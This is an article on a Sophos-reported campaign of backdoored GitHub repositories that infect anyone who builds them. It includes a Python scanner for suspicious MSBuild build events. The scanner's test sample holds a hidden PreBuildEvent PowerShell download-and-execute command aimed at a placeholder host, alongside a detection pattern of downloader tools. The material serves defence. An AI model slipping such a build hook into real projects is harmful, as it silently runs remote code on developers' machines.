A threat actor is targeting other hackers, gamers, and security researchers by uploading backdoored source code to GitHub that infects the devices of anyone who builds or runs it with backdoors and remote access malware.
The operation was uncovered by cybersecurity firm Sophos after a concerned client asked about a remote access trojan (RAT) called Sakura RAT, freely available on GitHub. Though the trojan’s visible code appeared largely nonfunctional, researchers found a PreBuildEvent hidden in its Visual Studio project file. Visual Studio runs a PreBuildEvent automatically before each compile, so simply building the project downloaded and installed malware on the would-be attacker’s own machine.
The GitHub account ‘ischhfd83,’ which published Sakura RAT, was linked to a broader malware distribution network spanning 141 repositories.
According to Sophos, 133 of these contained similar hidden backdoors. The campaign used several delivery vectors, including Python scripts with obfuscated payloads, booby-trapped JavaScript files, malicious Windows screensavers (.scr files), and further Visual Studio projects with covert build events.
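The build-event backdoor described above is easy to miss in an IDE, but it is trivial to find on disk: the event is just text inside the MSBuild project file. The following scanner is an added example, not Sophos’s tooling or anything from the repositories discussed. It parses .csproj, .vbproj and .vcxproj files, extracts every PreBuildEvent, PostBuildEvent and Exec command, and flags those that invoke a shell or a downloader. The sample project, the placeholder URL, and the indicator list are constructed for the demo and are assumptions; the blank-line padding in the sample is an assumed way an event could be pushed out of view, not a detail taken from the report.

```python
"""Scan MSBuild project files for build events that execute external code.

Added example (not Sophos's tooling). Run it over a cloned repository
BEFORE opening the solution in Visual Studio, since a PreBuildEvent fires
as soon as anyone compiles the project.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent"}
PROJECT_SUFFIXES = {".csproj", ".vbproj", ".vcxproj"}

# Indicators that a build event does more than copy build outputs.
# This list is an assumption for the example, not an authoritative signature.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc\w*|\biex\b|invoke-expression|downloadstring|"
    r"downloadfile|invoke-webrequest|\bcurl\b|\bwget\b|certutil|bitsadmin|"
    r"mshta|wscript|cscript|frombase64string|https?://",
    re.IGNORECASE,
)


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace (if any) from an element tag."""
    return tag.rsplit("}", 1)[-1]


def extract_build_events(xml_text: str) -> list[tuple[str, str]]:
    """Return (kind, command) pairs for every build event in a project file.

    Whitespace is stripped, so padding the command with blank lines or
    spaces to hide it in the IDE does not hide it from the scanner.
    """
    root = ET.fromstring(xml_text)
    events = []
    for el in root.iter():
        name = _local(el.tag)
        if name in EVENT_TAGS and el.text and el.text.strip():
            events.append((name, el.text.strip()))
        elif name == "Exec" and el.get("Command"):
            events.append(("Exec", el.get("Command").strip()))
    return events


def flag_events(xml_text: str) -> list[dict]:
    """Classify each build event; suspicious ones carry the matched indicator."""
    findings = []
    for kind, cmd in extract_build_events(xml_text):
        m = SUSPICIOUS.search(cmd)
        findings.append({
            "kind": kind,
            "command": cmd,
            "suspicious": m is not None,
            "indicator": m.group(0) if m else None,
        })
    return findings


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every project file under root; unparseable files are flagged too."""
    results = {}
    for path in root.rglob("*"):
        if path.suffix.lower() not in PROJECT_SUFFIXES:
            continue
        try:
            results[str(path)] = flag_events(path.read_text(encoding="utf-8-sig"))
        except ET.ParseError as exc:
            results[str(path)] = [{"kind": "error", "command": str(exc),
                                   "suspicious": True, "indicator": "unparseable"}]
    return results


# Constructed sample project: one benign post-build copy and one pre-build
# event that launches PowerShell. The URL is a placeholder, not an indicator
# from the campaign; the blank lines are an assumed out-of-view padding trick.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)release"</PostBuildEvent>
    <PreBuildEvent>




      powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"</PreBuildEvent>
  </PropertyGroup>
</Project>
"""

if __name__ == "__main__":
    for f in flag_events(SAMPLE_CSPROJ):
        tag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"[{tag}] {f['kind']}: {f['command'][:80]}")
```

Point `scan_tree(Path("path/to/clone"))` at a freshly cloned repository and review anything flagged before building; a legitimate project rarely needs PowerShell, a downloader, or a URL in a build event.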
The researchers believe that the observed malware is part of a broader coordinated campaign. Some repositories were abandoned after late 2023, but most remain operational. Interestingly, Sakura RAT’s media attention lured so-called ‘script kiddies’, who were enticed to download and test the code, unknowingly infecting themselves.
Once executed or compiled, the code triggers a multi-stage infection chain. Visual Basic scripts launch PowerShell commands that retrieve an encoded payload from hardcoded URLs. That payload in turn downloads a 7-Zip archive from GitHub containing an Electron application disguised as “SearchFilter.exe.” The app runs obfuscated JavaScript capable of profiling the system, executing commands, disabling Windows Defender, and installing further malware.
Among the second-stage payloads observed were well-known infostealers and RATs such as Lumma Stealer, AsyncRAT, and Remcos.
“This investigation is a good example of how threats can be much more complex than they first appear. From an initial customer query about a new RAT, we uncovered a significant amount of backdoored GitHub repositories, containing multiple kinds of backdoors. And the backdoors are not simple; as it turned out, they were only the first step in a long and convoluted infection chain, eventually leading to multiple RATs and infostealers,” Sophos concluded.